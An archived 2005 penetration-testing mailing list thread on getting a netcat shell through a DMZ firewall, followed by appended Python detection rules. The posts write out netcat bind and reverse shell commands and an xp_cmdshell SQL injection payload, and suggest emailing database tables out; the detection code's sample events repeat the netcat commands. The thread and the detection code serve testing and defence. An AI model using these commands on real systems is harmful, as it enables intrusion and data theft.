Penetration Testing mailing list archives
Re: Netcat Question
From: Jordan.DelGrande () ey com
Date: Wed, 1 Jun 2005 11:05:40 -0400
Hi Intel96,

It seems that you are being blocked both ways (inbound, outbound) by the DMZ firewall, although it seems really weird that the second command does not work - maybe checking for SSL packets only? They might have a proxy-based firewall? Are you on a public IP with no firewall?

As a last resort you can have the server listen on port 80, but this will DOS their web server for the period of time you have a shell active. Might want to do this really late at night if the client allows? Personally I wouldn't do this until all avenues have been tried.

Instead, as you can perform SQL injection, do you not have access to perform xp_cmdshell as follows?

z' exec master..xp_cmdshell 'dir c:'--

This way you can upload your tools via FTP and execute via the SQL server ;-) You might also want to try and email the results of each table to yourself (as long as you have the privileges).

Hope this helps,
Jordan

intel96 <intel96 () bellsouth net>
05/31/2005 06:39 PM

To: pen-test () securityfocus com
cc:
Subject: Netcat Question

To All,

I am conducting a pentest and I have been able to upload netcat to the web server (IIS 6.0 - with ports 80/443 open) via FTP. I have tried to establish a shell both ways, but cannot get it to work.

On the web server I first tried:

nc.exe -l -p 8000 -e cmd.exe

When I tried to connect to port 8000 on the web server I received a timeout on my side. I have also tried this with port 53 and it also did not work.

I then tried:

nc.exe -nv my_public_ip_address 443 -d -e cmd.exe

This did not work either. I did not see the remote system trying to connect to my system via my logs.

I have access to upload anything to the system and run most commands via SQL injection. I have administrator level access on the system at this time.

Any ideas on how I can get this shell to work? Or are there any other commands that may provide me more access or allow me to dump the database?
Thanks,
Intel96
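From the defender's side, the two techniques discussed in this thread leave a distinctive footprint in process-creation telemetry: netcat started with -e (or -c) pointing at cmd.exe, and cmd.exe whose parent process is sqlservr.exe, which is what xp_cmdshell looks like on the host. The following detection logic is an added example written for this archive page, not code posted by anyone in the thread. It assumes process-creation events (Windows Security 4688 or Sysmon event 1) have already been reduced to the four fields shown; the host names, file paths, the 203.0.113.5 address and the sample events are constructed for the example.

```python
"""
Flag the two host-level patterns from the thread above in process-creation events:
  1. nc/ncat launched with -e/-c <shell>  (bind or reverse shell via netcat)
  2. cmd.exe/powershell.exe spawned by sqlservr.exe (xp_cmdshell execution)
Event shape is an assumption: one record per process start with parent image,
image and command line, as Windows 4688 or Sysmon event 1 provide.
"""
import ntpath
from dataclasses import dataclass


@dataclass
class ProcEvent:
    """One process-creation record reduced to the fields the rules need."""
    host: str
    parent_image: str
    image: str
    command_line: str


SHELLS = {"cmd.exe", "powershell.exe", "cmd", "powershell"}
NETCAT_NAMES = {"nc.exe", "ncat.exe", "netcat.exe", "nc", "ncat"}
SQL_SERVER = "sqlservr.exe"

# Constructed sample events (hypothetical host "webdmz01"); not real telemetry.
SAMPLE_EVENTS = [
    ProcEvent("webdmz01", r"C:\Windows\System32\cmd.exe",
              r"C:\inetpub\wwwroot\nc.exe", "nc.exe -l -p 8000 -e cmd.exe"),
    ProcEvent("webdmz01", r"C:\Windows\System32\cmd.exe",
              r"C:\inetpub\wwwroot\nc.exe", "nc.exe -nv 203.0.113.5 443 -d -e cmd.exe"),
    ProcEvent("webdmz01", r"C:\Program Files\Microsoft SQL Server\MSSQL\Binn\sqlservr.exe",
              r"C:\Windows\System32\cmd.exe", 'cmd.exe /c dir c:\\'),
    # Benign: an interactive cmd.exe started from the desktop shell.
    ProcEvent("webdmz01", r"C:\Windows\explorer.exe",
              r"C:\Windows\System32\cmd.exe", "cmd.exe"),
    # Benign-ish: netcat used as a port probe, no -e/-c, so no shell is exposed.
    ProcEvent("webdmz01", r"C:\Windows\System32\cmd.exe",
              r"C:\tools\nc.exe", "nc.exe -zv 10.0.0.5 80"),
]


def basename(path: str) -> str:
    """Lower-cased file name of a Windows path (handles quoted tokens too)."""
    return ntpath.basename(path.strip('"')).lower()


def netcat_spawns_shell(ev: ProcEvent) -> bool:
    """True when the image is netcat and -e/-c is followed by a shell program."""
    if basename(ev.image) not in NETCAT_NAMES:
        return False
    tokens = ev.command_line.split()
    for i, tok in enumerate(tokens[:-1]):
        if tok.lower() in ("-e", "-c") and basename(tokens[i + 1]) in SHELLS:
            return True
    return False


def sql_server_spawns_shell(ev: ProcEvent) -> bool:
    """True when a shell's parent is the SQL Server service: the xp_cmdshell footprint."""
    return basename(ev.parent_image) == SQL_SERVER and basename(ev.image) in SHELLS


RULES = {
    "netcat_shell": netcat_spawns_shell,
    "xp_cmdshell_exec": sql_server_spawns_shell,
}


def analyze(events):
    """Return (rule_name, host, command_line) for every event a rule matches."""
    hits = []
    for ev in events:
        for name, rule in RULES.items():
            if rule(ev):
                hits.append((name, ev.host, ev.command_line))
    return hits


if __name__ == "__main__":
    for name, host, cmdline in analyze(SAMPLE_EVENTS):
        print(f"{host}: {name}: {cmdline}")
```

The parent-child rule is the more durable of the two: a renamed netcat binary defeats the name check, but any command run through xp_cmdshell still has sqlservr.exe as its parent, so that relationship (plus xp_cmdshell being disabled by default and alerting on sp_configure changes that enable it) is the control worth building first.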
Current thread:
- RE: Netcat Question Meidinger Chris (Jun 01)
- <Possible follow-ups>
- Netcat Question intel96 (Jun 01)
- RE: Netcat Question Miguel Dilaj (Jun 01)
- Re: Netcat Question Jordan . DelGrande (Jun 01)
- Re: Netcat Question Mariano Nuñez Di Croce (Jun 01)
- Re: Netcat Question atomek (Jun 01)
- RE: Netcat Question Bartholomew, Brian J (Jun 01)